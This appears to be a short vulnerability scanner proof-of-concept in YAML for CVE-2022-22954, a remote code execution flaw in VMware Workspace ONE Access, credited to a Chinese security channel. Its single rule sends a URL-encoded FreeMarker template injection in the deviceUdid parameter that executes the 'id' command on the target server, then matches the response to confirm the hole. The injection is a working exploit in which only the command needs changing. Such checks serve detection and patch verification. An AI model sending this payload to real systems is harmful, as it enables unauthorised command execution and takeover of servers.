name: poc-yaml-CVE-2022-22954-VMware-RCE
rules:
  - method: GET
    path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d
    expression: |
      response.status == 400 && "device id:".bmatches(response.body)
detail:
  author: mamba
  description: "CVE-2022-22954-VMware-RCE by chaosec公众号"
  links:
    - https://github.com/chaosec2021